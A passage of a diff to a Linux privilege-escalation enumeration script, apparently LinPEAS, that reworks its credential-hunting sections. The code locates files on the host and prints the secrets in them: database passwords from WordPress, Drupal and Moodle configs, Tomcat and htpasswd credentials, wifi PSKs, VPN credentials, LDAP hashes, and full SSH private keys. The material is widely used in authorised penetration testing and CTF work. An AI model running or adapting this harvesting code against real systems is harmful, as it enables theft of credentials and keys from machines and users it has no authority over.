[ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default$\"`" ]; then echo_not_found "000-default"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; - #-- SI) PHP cookies files - phpsess1=`ls /var/lib/php/sessions 2>/dev/null` - phpsess2=$(echo "$FIND_TMP\n$FIND_VAR\n$FIND_MNT" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*') - printf $Y"[+] "$GREEN"Searching PHPCookies\n"$NC - if [ "$phpsess1" ] || [ "$phpsess2" ]; then - if [ "$phpsess1" ]; then ls /var/lib/php/sessions 2>/dev/null; fi - if [ "$phpsess2" ]; then $(echo "$FIND_TMP $FIND_VAR" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*'); fi - else echo_not_found - fi - echo "" - #-- SI) Wordpress user, password, databname and host - printf $Y"[+] "$GREEN"Searching Wordpress wp-config.php files\n"$NC - wp=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'wp-config\.php$') - if [ "$wp" ]; then - printf "$wp\n" | while read f; do echo "$f"; grep -E "PASSWORD|USER|NAME|HOST" "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; echo ""; done - else echo_not_found "wp-config.php" - fi - echo "" + print_2title "Analizing Tomcat Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then echo_not_found "tomcat-users.xml"; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - #-- SI) Drupal user, password, databname and host - printf $Y"[+] "$GREEN"Searching Drupal settings.php files\n"$NC - drup=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'settings\.php$') - if [ "$drup" ]; then - printf "%s\n" "$drup" | while read f; do - if [ "`echo $f | grep '/default/settings.php'`" ]; then #Check path /default/settings.php - printf "Drupal settings.php file found: $f\n" - grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" $f 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; - echo "" - fi - done - else echo_not_found "/default/settings.php" - fi - echo "" + + print_2title "Analizing FastCGI Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then echo_not_found "fastcgi_params"; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; - #-- SI) Moodle user, password, databname and host - printf $Y"[+] "$GREEN"Searching Moodle config.php files\n"$NC - moo=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'config\.php$') - if [ "$moo" ]; then - printf "%s\n" "$moo" | while read f; do - if [ "`echo $f | grep -i moodle/config.php`" ]; then - printf "Moodle config.php file found: $f\n" - grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" $f 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; - fi - done - else echo_not_found "config.php inside a moodle folder" - fi - echo "" - #-- SI) Tomcat users - printf $Y"[+] "$GREEN"Searching Tomcat users file\n"$NC - tomcat=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'tomcat-users\.xml$') - if [ "$tomcat" ]; then - echo "tomcat-users.xml file found: $tomcat" - printf "%s\n" "$tomcat" | while read f; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; done - else echo_not_found "tomcat-users.xml" - fi - echo "" + print_2title "Analizing Http conf Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then echo_not_found "httpd.conf"; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; - #-- SI) Mongo Information - printf $Y"[+] "$GREEN"Mongo information\n"$NC - mongos=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'mongod.*\.conf$') - (mongo --version 2>/dev/null || mongod --version 2>/dev/null) || echo_not_found "mongo binary" - printf "%s\n" "$mongos" | while read f; do - if [ "$f" ]; then - echo "Found $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,auth*=*true|pass.*,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - #TODO: Check if you can login without password and warn the user - echo "" + print_2title "Analizing Htpasswd Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then echo_not_found ".htpasswd"; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - #-- SI) Supervisord conf file - printf $Y"[+] "$GREEN"Searching supervisord configuration file\n"$NC - supervisorf=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'supervisord\.conf') - if [ "$supervisorf" ]; then - printf "%s\n" "$supervisorf" | while read f; do - echo "Found $f"; - cat "$f" 2>/dev/null | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port|username|password,${C}[1;31m&${C}[0m,"; - done - else echo_not_found "supervisord.conf" - fi - echo "" - #-- SI) Cesi conf file - cesi=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'cesi\.conf') - printf $Y"[+] "$GREEN"Searching cesi configuration file\n"$NC - if [ "$cesi" ]; then - printf "$cesi\n" - printf "%s\n" "$cesi" | while read f; do cat "$f" 2>/dev/null | grep "username.*=\|password.*=\|host.*=\|port.*=\|database.*=" | sed -${E} "s,username|password|database,${C}[1;31m&${C}[0m,"; done - else echo_not_found "cesi.conf" - fi - echo "" + print_2title "Analizing PHPCookies Files (limit 70)" + ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions + if ! 
[ "`echo \"$PSTORAGE_PHPCOOKIES\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHPCOOKIES" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - #-- SI) Rsyncd conf file - rsyncd=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'rsyncd\.conf|rsyncd\.secrets') - printf $Y"[+] "$GREEN"Searching Rsyncd config file\n"$NC - if [ "$rsyncd" ]; then - printf "%s\n" "$rsyncd" | while read f; do - printf "$f\n" - if [ `echo "$f" | grep -i "secrets"` ]; then - cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - else - cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,secrets.*|auth.*users.*=,${C}[1;31m&${C}[0m," - fi - echo "" - done - else echo_not_found "rsyncd.conf" - fi - #-- SI) Hostapd conf file - printf $Y"[+] "$GREEN"Searching Hostapd config file\n"$NC - hostapd=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'hostapd\.conf') - if [ "$hostapd" ]; then - printf $Y"[+] "$GREEN"Hostapd conf was found\n"$NC - printf "$hostapd\n" - printf "%s\n" "$hostapd" | while read f; do cat "$f" 2>/dev/null | grep "passphrase" | sed "s,passphrase.*,${C}[1;31m&${C}[0m,"; done - else echo_not_found "hostapd.conf" - fi - echo "" + print_2title "Analizing Wordpress Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then echo_not_found "wp-config.php"; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Drupal Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then echo_not_found "settings.php"; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Moodle Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then echo_not_found "config.php"; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Supervisord Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then echo_not_found "supervisord.conf"; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Cesi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then echo_not_found "cesi.conf"; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Rsync Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then echo_not_found "rsyncd.conf"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then echo_not_found "rsyncd.secrets"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Hostapd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; + #-- SI) Wifi conns - printf $Y"[+] "$GREEN"Searching wifi conns file\n"$NC + print_2title "Searching wifi conns file" wifi=`find /etc/NetworkManager/system-connections/ -type f 2>/dev/null` if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${C}[1;31m&${C}[0m,"; done + printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done else echo_not_found fi echo "" - #-- SI) Anaconda-ks conf files - printf $Y"[+] "$GREEN"Searching Anaconda-ks config files\n"$NC - anaconda=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'anaconda-ks\.cfg') - if [ "$anaconda" ]; then - printf "$anaconda\n" - printf "%s\n" "$anaconda" | while read f; do cat "$f" 2>/dev/null | grep "rootpw" | sed 
"s,rootpw.*,${C}[1;31m&${C}[0m,"; done - else echo_not_found "anaconda-ks.cfg" - fi - echo "" + print_2title "Analizing Anaconda-ks Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then echo_not_found "anaconda-ks.cfg"; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; - #-- SI) VNC files - printf $Y"[+] "$GREEN"Searching .vnc directories and their passwd files\n"$NC - vnc=$(echo "$FIND_DIR_HOME\n$FIND_DIR_USERS\n$FIND_DIR_MNT" | grep -E '\.vnc') - if [ "$vnc" ]; then - printf "$vnc\n" - printf "%s\n" "$vnc" | while read d; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; done - else echo_not_found ".vnc" - fi - echo "" - #-- SI) LDAP directories - printf $Y"[+] "$GREEN"Searching ldap directories and their hashes\n"$NC - ldap=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'ldap$') - if [ "$ldap" ]; then - printf "$ldap\n" - echo "The password hash is from the {SSHA} to 'structural'"; - printf "%s\n" "$ldap" | while read d; do cat "$d/*.bdb" 2>/dev/null | grep -i -a -E -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${C}[1;31m&${C}[0m,g"; done - else echo_not_found "ldap" - fi - echo "" + print_2title "Analizing VNC Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then echo_not_found ".vnc"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; for ff in $(find "$f" -name "passwd"); do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then echo_not_found "*vnc*.c*nf*"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then echo_not_found "*vnc*.ini"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then echo_not_found "*vnc*.txt"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then echo_not_found "*vnc*.xml"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Ldap Files (limit 70)" + echo "The password hash is from the {SSHA} to 'structural'" + if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then echo_not_found "ldap"; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; for ff in $(find "$f" -name "*.bdb"); do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing Open VPN Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_OPEN_VPN\" | grep -E \"\.ovpn$\"`" ]; then echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPEN_VPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; - #-- SI) .ovpn files - printf $Y"[+] "$GREEN"Searching .ovpn files and credentials\n"$NC - ovpn=$(echo "$FIND_ETC\n$FIND_USR\n$FIND_HOME\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '\.ovpn') - if [ "$ovpn" ]; then - printf "$ovpn\n" - printf "%s\n" "$ovpn" | while read f; do - if [ -r "$f" ]; then - echo "Checking $f:" - cat "$f" 2>/dev/null | grep "auth-user-pass" | sed -${E} "s,auth-user-pass.*,${C}[1;31m&${C}[0m,"; - fi - done - else echo_not_found ".ovpn" - fi - echo "" #-- SI) ssh files - printf $Y"[+] "$GREEN"Searching ssl/ssh files\n"$NC - ssh=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'id_dsa.*|id_rsa.*|known_hosts|authorized_hosts|authorized_keys') - certsb4=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pem|.*\.cer|.*\.crt' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib.*') - if [ "$certsb4" ]; then certsb4_grep=`grep -L "\"\|'\|(" $certsb4 2>/dev/null`; fi - certsbin=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.csr|.*\.der' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') - clientcert=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pfx|.*\.p12' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') - 
sshagents=$(echo "$FIND_TMP" | grep -E 'agent.*') - homesshconfig=$(echo "$FIND_HOME $FIND_USR" | grep -E 'config' | grep "ssh") + print_2title "Searching ssl/ssh files" + if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=`grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null`; fi sshconfig="`ls /etc/ssh/ssh_config 2>/dev/null`" hostsdenied="`ls /etc/hosts.denied 2>/dev/null`" hostsallow="`ls /etc/hosts.allow 2>/dev/null`" - if [ "$ssh" ]; then - printf "$ssh\n" - fi + print_2title "Analizing SSH FILES Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"authorized_hosts$\"`" ]; then echo_not_found "authorized_hosts"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m," + + grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," if [ "$TIMEOUT" ]; then privatekeyfilesetc=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` 
@@ -2203,116 +2173,105 @@ if [ "`echo $CHECKS | grep SofI`" ]; then privatekeyfilesetc=`grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` #If there is tons of files linpeas gets frozen here without a timeout privatekeyfileshome=`grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null` fi - + if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - printf "Possible private SSH keys were found!\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi + echo "" + print_3title "Possible private SSH keys were found!" 
| sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi + echo "" fi - if [ "$certsb4_grep" ] || [ "$certsbin" ]; then - echo " --> Some certificates were found (out limited):" + if [ "$certsb4_grep" ] || [ "$$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" printf "$certsb4_grep\n" | head -n 20 - printf "$certsbin\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" fi - if [ "$clientcert" ]; then - echo " --> Some client certificates were found:" - printf "$clientcert\n" + if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" + echo "" fi - if [ "$sshagents" ]; then - echo " --> Some SSH Agent files were found:" - printf "$sshagents\n" + if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" fi if [ "`ssh-add -l 2>/dev/null | grep -v 'no identities'`" ]; then - echo " --> SSH Agents listed:" + print_3title "Listing SSH Agents" ssh-add -l + echo "" fi - if [ "$homesshconfig" ]; then - echo " --> Some home ssh config file was found" - printf "$homesshconfig\n" - printf "%s\n" "$homesshconfig" | while read f; do cat "$f" 2>/dev/null | grep -v "^$" | sed -${E} "s,User|ProxyCommand,${C}[1;31m&${C}[0m,"; done + if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} 
